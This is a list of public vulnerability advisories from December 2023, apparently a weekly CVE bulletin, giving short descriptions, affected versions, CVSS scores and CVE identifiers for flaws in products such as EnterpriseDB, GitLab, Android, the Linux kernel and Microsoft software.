enterprisedb -- postgres_advanced_server
An issue was discovered in EnterpriseDB Postgres Advanced Server (EPAS) before 11.21.32, 12.x before 12.16.20, 13.x before 13.12.16, 14.x before 14.9.0, and 15.x before 15.4.0. It permits an authenticated user to use DBMS_PROFILER to remove all accumulated profiling data on a system-wide basis, regardless of that user's permissions.
2023-12-12
6.5
CVE-2023-41120
[email protected]
enterprisedb -- postgres_advanced_server
An issue was discovered in EnterpriseDB Postgres Advanced Server (EPAS) before 11.21.32, 12.x before 12.16.20, 13.x before 13.12.16, 14.x before 14.9.0, and 15.x before 15.4.0. It allows an authenticated user to to obtain information about whether certain files exist on disk, what errors if any occur when attempting to read them, and some limited information about their contents (regardless of permissions). This can occur when a superuser has configured one or more directories for filesystem access via CREATE DIRECTORY and adopted certain non-default settings for log_line_prefix and log_connections.
2023-12-12
4.3
CVE-2023-41113
[email protected]
enterprisedb -- postgres_advanced_server
An issue was discovered in EnterpriseDB Postgres Advanced Server (EPAS) before 11.21.32, 12.x before 12.16.20, 13.x before 13.12.16, 14.x before 14.9.0, and 15.x before 15.4.0. It allows an authenticated user to refresh any materialized view, regardless of that user's permissions.
2023-12-12
4.3
CVE-2023-41116
[email protected]
espeak-ng -- espeak-ng
Espeak-ng 1.52-dev was discovered to contain a Floating Point Exception via the function PeaksToHarmspect at wavegen.c.
2023-12-12
5.5
CVE-2023-49994
[email protected]
evershop -- evershop
Cross Site Scripting vulnerability in EverShop NPM versions before v.1.0.0-rc.5 allows a remote attacker to obtain sensitive information via a crafted request to the ProductGrid function in admin/productGrid/Grid.jsx.
2023-12-08
6.1
CVE-2023-46494
[email protected]
[email protected]
evershop -- evershop
Cross Site Scripting vulnerability in EverShop NPM versions before v.1.0.0-rc.8 allows a remote attacker to obtain sensitive information via a crafted request to the sortBy parameter.
2023-12-08
6.1
CVE-2023-46495
[email protected]
[email protected]
evershop -- evershop
Cross Site Scripting vulnerability in EverShop NPM versions before v.1.0.0-rc.5 allows a remote attacker to obtain sensitive information via a crafted scripts to the Admin Panel.
2023-12-08
6.1
CVE-2023-46499
[email protected]
[email protected]
evershop -- evershop
Directory Traversal vulnerability in EverShop NPM versions before v.1.0.0-rc.8 allows a remote attacker to obtain sensitive information via a crafted request to the readDirSync function in fileBrowser/browser.js.
2023-12-08
5.3
CVE-2023-46493
[email protected]
[email protected]
evershop -- evershop
Directory Traversal vulnerability in EverShop NPM versions before v.1.0.0-rc.8 allows a remote attacker to obtain sensitive information via a crafted request to the mkdirSync function in the folderCreate/createFolder.js endpoint.
2023-12-08
5.4
CVE-2023-46497
[email protected]
[email protected]
fortinet -- fortiadc
An improper authorization vulnerability [CWE-285] in Fortinet FortiADC version 7.4.0 and before 7.2.2 may allow a low privileged user to read or backup the full system configuration via HTTP or HTTPS requests.
2023-12-13
5.4
CVE-2023-41673
[email protected]
fortinet -- fortisandbox
A improper neutralization of input during web page generation ('cross-site scripting') in Fortinet FortiSandbox version 4.4.1 and 4.4.0 and 4.2.0 through 4.2.5 and 4.0.0 through 4.0.3 and 3.2.0 through 3.2.4 and 3.1.0 through 3.1.5 and 3.0.0 through 3.0.4 allows attacker to execute unauthorized code or commands via crafted HTTP requests in capture traffic endpoint.
2023-12-13
5.4
CVE-2023-41844
[email protected]
fortinet -- fortisandbox
An improper neutralization of input during web page generation ('cross-site scripting') in Fortinet FortiSandbox version 4.4.1 and 4.4.0 and 4.2.0 through 4.2.5 and 4.0.0 through 4.0.3 and 3.2.0 through 3.2.4 and 3.1.0 through 3.1.5 allows attacker to execute unauthorized code or commands via crafted HTTP requests
2023-12-13
5.4
CVE-2023-45587
[email protected]
fortinet -- fortiweb
An improper output neutralization for logs in Fortinet FortiWeb 6.2.0 - 6.2.8, 6.3.0 - 6.3.23, 7.0.0 - 7.0.9, 7.2.0 - 7.2.5 and 7.4.0 may allow an attacker to forge traffic logs via a crafted URL of the web application.
2023-12-13
5.3
CVE-2023-46713
[email protected]
franklin-electric -- system_sentinel_anyware
Franklin Fueling Systems System Sentinel AnyWare (SSA) version 1.6.24.492 is vulnerable to Open Redirect. The 'path' parameter of the prefs.asp resource allows an attacker to redirect a victim user to an arbitrary web site using a crafted URL.
2023-12-08
6.1
CVE-2023-48928
[email protected]
gitlab -- gitlab
An issue has been discovered in GitLab CE/EE affecting all versions before 16.4.4, all versions starting from 15.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. File integrity may be compromised when source code or installation packages are pulled from a specific tag.
2023-12-15
5.7
CVE-2023-6051
[email protected]
[email protected]
gitlab -- gitlab
An issue has been discovered in GitLab EE affecting all versions starting before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. It was possible to overflow the time spent on an issue that altered the details shown in the issue boards.
2023-12-15
4.3
CVE-2023-3904
[email protected]
[email protected]
gitlab -- gitlab
An issue has been discovered in GitLab affecting all versions starting from 9.3 before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. In certain situations, it may have been possible for developers to override predefined CI variables via the REST API.
2023-12-15
4.3
CVE-2023-5061
[email protected]
[email protected]
gitlab -- gitlab
An issue has been discovered in GitLab CE/EE affecting all versions from 16.3 before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. File integrity may be compromised when specific HTML encoding is used for file names leading for incorrect representation in the UI.
2023-12-15
4.8
CVE-2023-5512
[email protected]
[email protected]
glpi -- glpi
GLPI is a free asset and IT management software package. Starting in version 10.0.0 and prior to version 10.0.11, the saved search feature can be used to perform a SQL injection. Version 10.0.11 contains a patch for the issue.
2023-12-13
6.5
CVE-2023-43813
[email protected]
[email protected]
[email protected]
goodix -- fingerprint_sensor_firmware
The Goodix Fingerprint Device, as shipped in Dell Inspiron 15 computers, does not follow the Secure Device Connection Protocol (SDCP) when enrolling via Linux, and accepts an unauthenticated configuration packet to select the Windows template database, which allows bypass of Windows Hello authentication by enrolling an attacker's fingerprint.
2023-12-09
6.4
CVE-2023-50430
[email protected]
google -- android
there is a possible way for the secure world to write to NS memory due to a logic error in the code. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.
2023-12-08
6.7
CVE-2023-48405
[email protected]
google -- android
there is a possible permanent DoS or way for the modem to boot unverified firmware due to a logic error in the code. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.
2023-12-08
6.7
CVE-2023-48406
[email protected]
google -- android
In the Pixel Camera Driver, there is a possible use after free due to a logic error in the code. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.
2023-12-08
6.7
CVE-2023-48414
[email protected]
google -- android
there is a possible use after free due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.
2023-12-08
6.4
CVE-2023-48420
[email protected]
google -- android
In ProtocolMiscATCommandAdapter::Init() of protocolmiscadapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with baseband firmware compromise required. User interaction is not needed for exploitation.
2023-12-08
5.5
CVE-2023-48399
[email protected]
google -- android
In GetSizeOfEenlRecords of protocoladapter.cpp, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.
2023-12-08
5.5
CVE-2023-48401
[email protected]
google -- android
In ProtocolNetSimFileInfoAdapter() of protocolnetadapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with baseband firmware compromise required. User interaction is not needed for exploitation.
2023-12-08
5.5
CVE-2023-48408
[email protected]
google -- android
In SignalStrengthAdapter::FillGsmSignalStrength() of protocolmiscadapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with baseband firmware compromise required. User interaction is not needed for exploitation.
2023-12-08
5.5
CVE-2023-48411
[email protected]
google -- android
In private_handle_t of mali_gralloc_buffer.h, there is a possible information leak due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.
2023-12-08
5.5
CVE-2023-48412
[email protected]
google -- android
In Init of protocolembmsadapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.
2023-12-08
5.5
CVE-2023-48415
[email protected]
google -- android
In Init of protocolnetadapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.
2023-12-08
5.5
CVE-2023-48422
[email protected]
google -- android
In Init of protocolcalladapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with System execution privileges needed. User interaction is not needed for exploitation.
2023-12-08
4.9
CVE-2023-48397
[email protected]
google -- android
In Init of protocolnetadapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with System execution privileges needed. User interaction is not needed for exploitation.
2023-12-08
4.9
CVE-2023-48413
[email protected]
gpac -- gpac
An issue in GPAC v.2.2.1 and before allows a local attacker to cause a denial of service (DoS) via the ctts_box_read function of file src/isomedia/box_code_base.c.
2023-12-09
5.5
CVE-2023-47465
[email protected]
h2o -- h2o
h2o is an HTTP server with support for HTTP/1.x, HTTP/2 and HTTP/3. In version 2.3.0-beta2 and prior, when h2o is configured to listen to multiple addresses or ports with each of them using different backend servers managed by multiple entities, a malicious backend entity that also has the opportunity to observe or inject packets exchanged between the client and h2o may misdirect HTTPS requests going to other backends and observe the contents of that HTTPS request being sent. The attack involves a victim client trying to resume a TLS connection and an attacker redirecting the packets to a different address or port than that intended by the client. The attacker must already have been configured by the administrator of h2o to act as a backend to one of the addresses or ports that the h2o instance listens to. Session IDs and tickets generated by h2o are not bound to information specific to the server address, port, or the X.509 certificate, and therefore it is possible for an attacker to force the victim connection to wrongfully resume against a different server address or port on which the same h2o instance is listening. Once a TLS session is misdirected to resume to a server address / port that is configured to use an attacker-controlled server as the backend, depending on the configuration, HTTPS requests from the victim client may be forwarded to the attacker's server. An H2O instance is vulnerable to this attack only if the instance is configured to listen to different addresses or ports using the listen directive at the host level and the instance is configured to connect to backend servers managed by multiple entities. A patch is available at commit 35760540337a47e5150da0f4a66a609fad2ef0ab. As a workaround, one may stop using using host-level listen directives in favor of global-level ones.
2023-12-12
6.1
CVE-2023-41337
[email protected]
[email protected]
haxx -- curl
When saving HSTS data to an excessively long file name, curl could end up removing all contents, making subsequent requests using that file unaware of the HSTS status they should otherwise use.
2023-12-12
5.3
CVE-2023-46219
[email protected]
[email protected]
[email protected]
hitachi -- system_management_unit_firmware
SMU versions prior to 14.8.7825.01 are susceptible to unintended information disclosure, through URL manipulation. Authenticated users in Storage, Server or combined Server+Storage administrative roles are able to access SMU configuration backup, that would normally be barred to those specific administrative roles.
2023-12-11
6.5
CVE-2023-6538
[email protected]
hitachi_energy -- rtu500
A vulnerability exists in the webserver that affects the RTU500 series product versions listed below. A malicious actor could perform cross-site scripting on the webserver due to user input being improperly sanitized.
2023-12-14
5.4
CVE-2023-5769
[email protected]
home-assistant -- core
Home Assistant is open source home automation software. Prior to version 2023.12.3, the login page discloses all active user accounts to any unauthenticated browsing request originating on the Local Area Network. Version 2023.12.3 contains a patch for this issue. When starting the Home Assistant 2023.12 release, the login page returns all currently active user accounts to browsing requests from the Local Area Network. Tests showed that this occurs when the request is not authenticated and the request originated locally, meaning on the Home Assistant host local subnet or any other private subnet. The rationale behind this is to make the login more user-friendly and an experience better aligned with other applications that have multiple user-profiles. However, as a result, all accounts are displayed regardless of them having logged in or not and for any device that navigates to the server. This disclosure is mitigated by the fact that it only occurs for requests originating from a LAN address. But note that this applies to the local subnet where Home Assistant resides and to any private subnet that can reach it.
2023-12-15
4.3
CVE-2023-50715
[email protected]
[email protected]
honojs -- hono
Hono is a web framework written in TypeScript. Prior to version 3.11.7, clients may override named path parameter values from previous requests if the application is using TrieRouter. So, there is a risk that a privileged user may use unintended parameters when deleting REST API resources. TrieRouter is used either explicitly or when the application matches a pattern that is not supported by the default RegExpRouter. Version 3.11.7 includes the change to fix this issue. As a workaround, avoid using TrieRouter directly.
2023-12-14
4.2
CVE-2023-50710
[email protected]
[email protected]
[email protected]
html-js -- doracms
An arbitrary file upload vulnerability in DoraCMS v2.1.8 allow attackers to execute arbitrary code via uploading a crafted HTML or image file to the user avatar.
2023-12-08
5.4
CVE-2023-49444
[email protected]
ibm -- api_connect
IBM API Connect V10.0.5.3 and V10.0.6.0 stores user credentials in browser cache which can be read by a local user. IBM X-Force ID: 271912.
2023-12-09
5.5
CVE-2023-47722
[email protected]
[email protected]
ibm -- i_access_client_solutions
IBM i Access Client Solutions 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.3 could allow an attacker to obtain a decryption key due to improper authority checks. IBM X-Force ID: 268270.
2023-12-14
6.2
CVE-2023-45184
[email protected]
[email protected]
ibm -- informix_dynamic_server
IBM Informix Dynamic Server 12.10 and 14.10 archecker is vulnerable to a heap buffer overflow, caused by improper bounds checking which could allow a local user to cause a segmentation fault. IBM X-Force ID: 251204.
2023-12-09
5.5
CVE-2023-28526
[email protected]
[email protected]
ibm -- informix_dynamic_server
IBM Informix Dynamic Server 12.10 and 14.10 cdr is vulnerable to a heap buffer overflow, caused by improper bounds checking which could allow a local user to cause a segmentation fault. IBM X-Force ID: 251206.
2023-12-09
5.5
CVE-2023-28527
[email protected]
[email protected]
ibm -- spectrum_scale
IBM Spectrum Scale 5.1.5.0 through 5.1.5.1 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 239080.
2023-12-14
5.9
CVE-2022-43843
[email protected]
[email protected]
ibm -- system_storage_virtualization_engine
IBM System Storage Virtualization Engine TS7700 3957-VEC, 3948-VED and 3957-VEC could allow a remote authenticated user to obtain sensitive information, caused by improper filtering of URLs. By submitting a specially crafted HTTP GET request, an attacker could exploit this vulnerability to view application source code, system configuration information, or other sensitive data related to the Management Interface. IBM X-Force ID: 272651.
2023-12-13
4.3
CVE-2023-49877
[email protected]
[email protected]
ibm -- system_storage_virtualization_engine
IBM System Storage Virtualization Engine TS7700 3957-VEC, 3948-VED and 3957-VEC could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 272652.
2023-12-13
4.3
CVE-2023-49878
[email protected]
[email protected]
idemia -- multiple_products
When reading DesFire keys, the function that reads the card isn't properly checking the boundaries when copying internally the data received. This allows a heap based buffer overflow that could lead to a potential Remote Code Execution on the targeted device. This is especially problematic if you use Default DESFire key.
2023-12-15
6.8
CVE-2023-33221
a87f365f-9d39-4848-9b3a-58c7cae69cab
idemia -- multiple_products
When handling contactless cards, usage of a specific function to get additional information from the card which doesn't check the boundary on the data received while reading. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device
2023-12-15
6.8
CVE-2023-33222
a87f365f-9d39-4848-9b3a-58c7cae69cab
in2code -- femanager
The femanager extension before 5.5.2, 6.x before 6.3.3, and 7.x before 7.0.1 for TYPO3 allows creation of frontend users in restricted groups (if there is a usergroup field on the registration form). This occurs because the usergroup.inList protection mechanism is mishandled.
2023-12-12
5.3
CVE-2022-44543
[email protected]
[email protected]
iteachyou -- dreamer_cms
Dreamer CMS v4.1.3 was discovered to contain a cross-site scripting (XSS) vulnerability in the article management department.
2023-12-08
5.4
CVE-2023-49484
[email protected]
jetbrains-- teamcity
In JetBrains TeamCity before 2023.11.1 a CSRF on login was possible
2023-12-15
4.3
CVE-2023-50870
[email protected]
jetbrains-- youtrack
In JetBrains YouTrack before 2023.3.22268 authorization check for inline comments inside thread replies was missed
2023-12-15
4.3
CVE-2023-50871
[email protected]
jfinalcms_project -- jfinalcms
JFinalCMS v5.0.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the column management department.
2023-12-08
5.4
CVE-2023-49485
[email protected]
jfinalcms_project -- jfinalcms
JFinalCMS v5.0.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the model management department.
2023-12-08
5.4
CVE-2023-49486
[email protected]
jfinalcms_project -- jfinalcms
JFinalCMS v5.0.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the navigation management department.
2023-12-08
5.4
CVE-2023-49487
[email protected]
jfinalcms_project -- jfinalcms
JFinalcms 5.0.0 is vulnerable to Cross Site Scripting (XSS) via carousel image editing.
2023-12-14
5.4
CVE-2023-50100
[email protected]
jfinalcms_project -- jfinalcms
JFinalcms 5.0.0 is vulnerable to Cross Site Scripting (XSS) via Label management editing.
2023-12-14
5.4
CVE-2023-50101
[email protected]
jfinalcms_project -- jfinalcms
JFinalcms 5.0.0 is vulnerable to Cross Site Scripting (XSS).
2023-12-14
5.4
CVE-2023-50102
[email protected]
jfinalcms_project -- jfinalcms
JFinalcms 5.0.0 is vulnerable to Cross Site Scripting (XSS) in the site management office.
2023-12-14
5.4
CVE-2023-50137
[email protected]
jqlang -- jq
jq is a command-line JSON processor. Version 1.7 is vulnerable to heap-based buffer overflow. Version 1.7.1 contains a patch for this issue.
2023-12-13
6.2
CVE-2023-50246
[email protected]
[email protected]
[email protected]
[email protected]
jqlang -- jq
jq is a command-line JSON processor. Version 1.7 is vulnerable to stack-based buffer overflow in builds using decNumber. Version 1.7.1 contains a patch for this issue.
2023-12-13
6.2
CVE-2023-50268
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
jupyter -- dockerspawner
dockerspawner is a tool to spawn JupyterHub single user servers in Docker containers. Users of JupyterHub deployments running DockerSpawner starting with 0.11.0 without specifying DockerSpawner.allowed_images configuration allow users to launch any pullable docker image, instead of restricting to only the single configured image, as intended. This issue has been addressed in commit 3ba4b665b which has been included in dockerspawner release version 13. Users are advised to upgrade. Users unable to upgrade should explicitly set DockerSpawner.allowed_images to a non-empty list containing only the default image will result in the intended default behavior.
2023-12-08
4.3
CVE-2023-48311
[email protected]
[email protected]
kaifa_technology -- webitr
Kaifa Technology WebITR is an online attendance system, it has insufficient validation for user input within a special function. A remote attacker with regular user privilege can exploit this vulnerability to inject arbitrary SQL commands to read database.
2023-12-15
6.5
CVE-2023-48395
[email protected]
kaifa_technology -- webitr
Kaifa Technology WebITR is an online attendance system. A remote attacker with regular user privilege can obtain partial sensitive system information from error message.
2023-12-15
4.3
CVE-2023-48393
[email protected]
kalcaddle -- kodexplorer
A vulnerability was found in kalcaddle KodExplorer up to 4.51.03. It has been declared as critical. This vulnerability affects unknown code of the file /index.php?pluginApp/to/yzOffice/getFile of the component API Endpoint Handler. The manipulation of the argument path/file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The patch is identified as 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. VDB-248218 is the identifier assigned to this vulnerability.
2023-12-16
6.3
CVE-2023-6850
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
kalcaddle -- kodexplorer
A vulnerability was found in kalcaddle KodExplorer up to 4.51.03. It has been rated as critical. This issue affects the function unzipList of the file plugins/zipView/app.php of the component ZIP Archive Handler. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The patch is named 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248219.
2023-12-16
6.3
CVE-2023-6851
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
kalcaddle -- kodexplorer
A vulnerability classified as critical has been found in kalcaddle KodExplorer up to 4.51.03. Affected is an unknown function of the file plugins/webodf/app.php. The manipulation leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The name of the patch is 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248220.
2023-12-16
6.3
CVE-2023-6852
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
kalcaddle -- kodexplorer
A vulnerability classified as critical was found in kalcaddle KodExplorer up to 4.51.03. Affected by this vulnerability is the function index of the file plugins/officeLive/app.php. The manipulation of the argument path leads to server-side request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The identifier of the patch is 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The identifier VDB-248221 was assigned to this vulnerability.
2023-12-16
6.3
CVE-2023-6853
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
keycloak -- keycloak
A flaw was found in Keycloak that prevents certain schemes in redirects, but permits them if a wildcard is appended to the token. This issue could allow an attacker to submit a specially crafted request leading to cross-site scripting (XSS) or further attacks. This flaw is the result of an incomplete fix for CVE-2020-10748.
2023-12-14
4.6
CVE-2023-6134
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
koush -- scrypted
Scrypted is a home video integration and automation platform. In versions 0.55.0 and prior, a reflected cross-site scripting vulnerability exists in the plugin-http.ts file via the owner' and 'pkg parameters. An attacker can run arbitrary JavaScript code. As of time of publication, no known patches are available.
2023-12-13
6.1
CVE-2023-47620
[email protected]
[email protected]
koush -- scrypted
Scrypted is a home video integration and automation platform. In versions 0.55.0 and prior, a reflected cross-site scripting vulnerability exists in the login page via the redirect_uri parameter. By specifying a url with the javascript scheme (javascript:), an attacker can run arbitrary JavaScript code after the login. As of time of publication, no known patches are available.
2023-12-13
6.1
CVE-2023-47623
[email protected]
[email protected]
linux -- kernel
sec_attest_info in drivers/accel/habanalabs/common/habanalabs_ioctl.c in the Linux kernel through 6.6.5 allows an information leak to user space because info->pad0 is not initialized.
2023-12-09
5.5
CVE-2023-50431
[email protected]
linux -- kernel
An out-of-bounds memory access flaw was found in the io_uring SQ/CQ rings functionality in the Linux kernel. This issue could allow a local user to crash the system.
2023-12-09
5.5
CVE-2023-6560
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
linux -- kernel
A null pointer dereference vulnerability was found in nft_dynset_init() in net/netfilter/nft_dynset.c in nf_tables in the Linux kernel. This issue may allow a local attacker with CAP_NET_ADMIN user privilege to trigger a denial of service.
2023-12-08
5.5
CVE-2023-6622
[email protected]
[email protected]
[email protected]
linux -- kernel
A null pointer dereference vulnerability was found in dpll_pin_parent_pin_set() in drivers/dpll/dpll_netlink.c in the Digital Phase Locked Loop (DPLL) subsystem in the Linux kernel. This issue could be exploited to trigger a denial of service.
2023-12-11
5.5
CVE-2023-6679
[email protected]
[email protected]
[email protected]
mantisbt -- linked_custom_fields
The LinkedCustomFields plugin for MantisBT allows users to link values between two custom fields, creating linked drop-downs. Prior to version 2.0.1, cross-site scripting in the MantisBT LinkedCustomFields plugin allows Javascript execution, when a crafted Custom Field is linked via the plugin and displayed when reporting a new Issue or editing an existing one. This issue is fixed in version 2.0.1. As a workaround, one may utilize MantisBT's default Content Security Policy, which blocks script execution.
2023-12-11
6.1
CVE-2023-49802
[email protected]
[email protected]
[email protected]
[email protected]
mattermost -- mattermost
Mattermost fails to handle a null request body in the /add endpoint, allowing a simple member to send a request with null request body to that endpoint and make it crash. After a few repetitions, the plugin is disabled.
2023-12-12
6.5
CVE-2023-49809
[email protected]
mattermost -- mattermost
Mattermost fails to perform authorization checks in the /plugins/playbooks/api/v0/runs/add-to-timeline-dialog endpoint of the Playbooks plugin allowing an attacker to get limited information about a post if they know the post ID
2023-12-12
5.3
CVE-2023-46701
[email protected]
mattermost -- mattermost
Mattermost fails to validate team membership when a user attempts to access a playbook, allowing a user with permissions to a playbook but no permissions to the team the playbook is on to access and modify the playbook. This can happen if the user was once a member of the team, got permissions to the playbook and was then removed from the team.
2023-12-12
5.4
CVE-2023-6547
[email protected]
mattermost -- mattermost
Mattermost fails to check whether a user is a guest when updating the tasks of a private playbook run allowing a guest to update the tasks of a private playbook run if they know the run ID.
2023-12-12
4.3
CVE-2023-49874
[email protected]
mattermost -- mattermost
Mattermost fails to perform correct authorization checks when creating a playbook action, allowing users without access to the playbook to create playbook actions. If the playbook action created is to post a message in a channel based on specific keywords in a post, some playbook information, like the name, can be leaked.
2023-12-12
4.3
CVE-2023-6727
[email protected]
microfocus -- arcsight_management_center
A potential vulnerability has been identified in Micro Focus ArcSight Management Center. The vulnerability could be remotely exploited resulting in stored Cross-Site Scripting (XSS).
2023-12-09
5.4
CVE-2020-25835
[email protected]
microsoft -- 365_apps
Microsoft Outlook Information Disclosure Vulnerability
2023-12-12
6.5
CVE-2023-35636
[email protected]
microsoft -- azure_devops_serve
Azure DevOps Server Spoofing Vulnerability
2023-12-14
6.5
CVE-2023-21751
[email protected]
microsoft -- azure_machine_learning_software_development_kit
Azure Machine Learning Compute Instance for SDK Users Information Disclosure Vulnerability
2023-12-12
4.7
CVE-2023-35625
[email protected]
microsoft -- dynamics_365
Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
2023-12-12
5.4
CVE-2023-36020
[email protected]
microsoft -- edge

Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability
2023-12-15
4.3
CVE-2023-36878
[email protected]
microsoft -- microsoft_office
Microsoft Word Information Disclosure Vulnerability
2023-12-12
5.5
CVE-2023-36009
[email protected]
microsoft -- office_long_term_servicing_channel
Microsoft Outlook for Mac Spoofing Vulnerability
2023-12-12
5.3
CVE-2023-35619
[email protected]
microsoft -- windows_10
XAML Diagnostics Elevation of Privilege Vulnerability
2023-12-12
6.7
CVE-2023-36003
[email protected]
microsoft -- windows_10_1507
Microsoft USBHUB 3.0 Device Driver Remote Code Execution Vulnerability
2023-12-12
6.8
CVE-2023-35629
[email protected]
microsoft -- windows_10_1507
Internet Connection Sharing (ICS) Denial of Service Vulnerability
2023-12-12
6.5
CVE-2023-35642
[email protected]
microsoft -- windows_11_22h2
Windows Kernel Denial of Service Vulnerability
2023-12-12
5.5
CVE-2023-35635
[email protected]
microsoft -- windows_server
DHCP Server Service Information Disclosure Vulnerability
2023-12-12
5.3
CVE-2023-36012
[email protected]
microweber -- microweber
Missing Standardized Error Handling Mechanism in GitHub repository microweber/microweber prior to 2.0.
2023-12-08
4.3
CVE-2023-6599
[email protected]
[email protected]
mindsdb -- mindsdb
MindsDB connects artificial intelligence models to real time data. Versions prior to 23.11.4.1 contain a server-side request forgery vulnerability in file.py. This can lead to limited information disclosure. Users should use MindsDB's staging branch or v23.11.4.1, which contain a fix for the issue.
2023-12-11
5.3
CVE-2023-49795
[email protected]
[email protected]
mindsdb -- mindsdb
MindsDB connects artificial intelligence models to real time data. Versions prior to 23.11.4.1 contain a limited file write vulnerability in file.py Users should use MindsDB's staging branch or v23.11.4.1, which contain a fix for the issue.
2023-12-11
5.3
CVE-2023-49796
[email protected]
[email protected]
mojotv -- base64captcha
When using the default implementation of Verify to check a Captcha, verification can be bypassed. For example, if the first parameter is a non-existent id, the second parameter is an empty string, and the third parameter is true, the function will always consider the Captcha to be correct.
2023-12-11
5.3
CVE-2023-45292
[email protected]
[email protected]
[email protected]
[email protected]
monicahq -- monica
A stored cross-site scripting (XSS) vulnerability exists in Monica (aka MonicaHQ) 4.0.0 via an SVG document uploaded by an authenticated user.
2023-12-11
5.4
CVE-2023-50465
[email protected]
[email protected]
[email protected]
morpheus65535 -- bazarr
Bazarr manages and downloads subtitles. In version 1.2.4, the proxy method in bazarr/bazarr/app/ui.py does not validate the user-controlled protocol and url variables and passes them to requests.get() without any sanitization, which leads to a blind server-side request forgery (SSRF). This issue allows for crafting GET requests to internal and external resources on behalf of the server. 1.3.1 contains a partial fix, which limits the vulnerability to HTTP/HTTPS protocols.
2023-12-15
5.3
CVE-2023-50266
[email protected]
[email protected]
[email protected]
naturalintelligence -- fast_xml_parser
fast-xml-parser before 4.1.2 allows proto for Prototype Pollution.
2023-12-12
6.5
CVE-2023-26920
[email protected]
[email protected]
[email protected]
ncp-e -- secure_enterprise_client
Support Assistant in NCP Secure Enterprise Client before 12.22 allows attackers read the contents of arbitrary files on the operating system by creating a symbolic link.
2023-12-09
6.5
CVE-2023-28869
[email protected]
ncp-e -- secure_enterprise_client
Insecure File Permissions in Support Assistant in NCP Secure Enterprise Client before 12.22 allow attackers to write to configuration files from low-privileged user accounts.
2023-12-09
6.5
CVE-2023-28870
[email protected]
ncp-e -- secure_enterprise_client
Support Assistant in NCP Secure Enterprise Client before 12.22 allows attackers to read registry information of the operating system by creating a symbolic link.
2023-12-09
4.3
CVE-2023-28871
[email protected]
netapp -- ontap_9
ONTAP 9 versions 9.12.1P8, 9.13.1P4, and 9.13.1P5 are susceptible to a vulnerability which will cause all SAS-attached FIPS 140-2 drives to become unlocked after a system reboot or power cycle or a single SAS-attached FIPS 140-2 drive to become unlocked after reinsertion. This could lead to disclosure of sensitive information to an attacker with physical access to the unlocked drives.
2023-12-15
4.3
CVE-2023-27317
[email protected]
octokit/webhooks -- octokit/webhooks
octokit/webhooks is a GitHub webhook events toolset for Node.js. Starting in 9.26.0 and prior to 9.26.3, 10.9.2, 11.1.2, and 12.0.4, there is a problem caused by an issue with error handling in the @octokit/webhooks library because the error can be undefined in some cases. The resulting request was found to cause an uncaught exception that ends the nodejs process. The bug is fixed in octokit/webhooks.js 9.26.3, 10.9.2, 11.1.2, and 12.0.4, app.js 14.02, octokit.js 3.1.2, and Protobot 12.3.3.
2023-12-15
5.4
CVE-2023-50728
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
octopus_deploy -- octopus_server
In affected versions of Octopus Server it is possible for the OpenID client secret to be logged in clear text during the configuration of Octopus Server.
2023-12-14
4.2
CVE-2023-1904
[email protected]
openfiler -- openfiler
A cross-site scripting (XSS) vulnerability in Openfiler ESA v2.99.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the nic parameter.
2023-12-11
6.1
CVE-2023-49488
[email protected]
